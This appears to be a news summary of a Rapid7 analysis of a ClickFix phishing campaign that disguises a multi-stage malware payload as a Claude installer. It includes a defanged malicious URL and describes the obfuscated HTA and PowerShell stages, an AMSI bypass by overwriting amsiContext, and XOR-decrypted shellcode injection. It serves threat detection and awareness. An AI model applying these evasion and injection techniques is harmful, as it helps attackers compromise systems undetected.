ClickFix Phishing Campaign Masquerades as Claude AI Installer to Target EU and US Organizations
Rapid7 has uncovered a ClickFix phishing campaign that uses a fake installer for the AI tool Claude to deliver a multi-stage payload targeting organizations in the EU and US.
Rapid7 has detailed a ClickFix phishing campaign that masquerades as an installer for the popular AI tool Claude, targeting organizations in the European Union and the United States. The campaign, detected and blocked by Rapid7's Managed Detection and Response (MDR) service, uses a multi-stage attack chain that begins with the execution of mshta.exe via the Windows run utility. The malicious URL, download-version[.]1-5-8[.]com/claude.msixbundle, was designed to impersonate an MSIX bundle for Claude, a tactic that leverages the growing interest in AI tools to trick users into executing the payload.
The attack chain starts with an HTA file embedded within a ZIP archive disguised as an MSIX bundle. The HTA contains obfuscated VBScript that, when deobfuscated, crafts and executes a PowerShell staging payload. This staging payload generates an MD5 hash based on the COMPUTERNAME and USERNAME environment variables, using the first 16 characters to construct a URL for fetching a second-stage PowerShell script. The script also includes a routine to overwrite the amsiContext field in System.Management.Automation.AmsiUtils, effectively bypassing AMSI (Anti-Malware Scan Interface) to evade detection.
The second-stage PowerShell script is highly obfuscated and contains a large byte array that, after base64 decoding and deobfuscation, reveals another PowerShell ScriptBlock. This ScriptBlock ultimately performs a process injection routine using the .NET interoperability library. The code includes a byte array with encrypted shellcode that is decrypted via a XOR routine, then uses Windows API calls such as NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtCreateThreadEx to inject the shellcode into a legitimate process, granting the attacker full control over the compromised system.
The campaign was detected on April 9, 2026, when Rapid7's detection rule "Attacker Technique - Remote Payload Execution via Run Utility (shell32.dll)" triggered an alert for mshta execution on a customer asset. The rule monitors the RunMRU registry key, which tracks the last 26 commands executed by the Windows run utility, a common vector for ClickFix attacks. Rapid7's SOC analysts were able to respond quickly, preventing further compromise across affected customers.
At the time of discovery, the campaign had very little traction on VirusTotal or within the broader security landscape, indicating that it was a targeted and relatively new threat. The malicious host was taken down before Rapid7 could obtain the original payload, but a copy was available on VirusTotal for analysis. The campaign highlights the continued effectiveness of ClickFix techniques, which rely on social engineering to trick users into executing malicious commands via the Windows run dialog.
Rapid7's analysis underscores the importance of robust detection rules and MDR services in identifying and mitigating such threats. The company emphasized that ClickFix campaigns remain a common and effective attack vector, and that organizations should implement monitoring for suspicious mshta executions and RunMRU registry key modifications. The use of a fake Claude installer also demonstrates how threat actors are capitalizing on the popularity of AI tools to increase the credibility of their lures.
This campaign serves as a reminder that even as AI tools become more integrated into daily workflows, they also present new opportunities for social engineering. Organizations should educate users about the risks of downloading software from untrusted sources and ensure that security solutions are configured to detect and block multi-stage attack chains like the one described by Rapid7.